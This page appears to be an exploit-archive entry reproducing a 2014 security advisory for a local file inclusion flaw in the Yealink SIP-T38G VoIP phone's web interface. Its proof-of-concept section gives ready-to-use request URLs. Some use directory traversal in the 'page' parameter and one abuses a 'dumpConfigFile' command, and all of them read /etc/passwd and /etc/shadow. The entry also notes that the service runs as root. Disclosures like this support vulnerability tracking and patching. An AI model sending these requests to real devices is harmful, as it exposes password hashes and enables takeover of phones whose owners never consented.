Skip to content
cyberexploits
remotehardwaretext

Yealink VoIP Phone SIP-T38G - Local File Inclusion

Yealink VoIP Phone SIP-T38G - Local File Inclusion

Publié le 2014-06-13

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/remote/33740.txt7eac4c3a
raw
Title: Yealink VoIP Phone SIP-T38G Local File Inclusion

Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team

Vendor Homepage: http://www.yealink.com/Companyprofile.aspx

Version: VoIP Phone SIP-T38G

CVE: CVE-2013-5756, CVE-2013-5757



Description:



Web interface contain a vulnerability that allow any page to be included.

We are able to disclose /etc/passwd & /etc/shadow



POC:

Using the page parameter (CVE-2013-5756):

http://

[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

http://

[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow



Using the command parameter (CVE-2013-5757):

http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")



*By viewing the shadow file we are able to conclude that cgiServer.exx run

under the root privileges. This lead to CVE-2013-5759.

Voir sur GitHub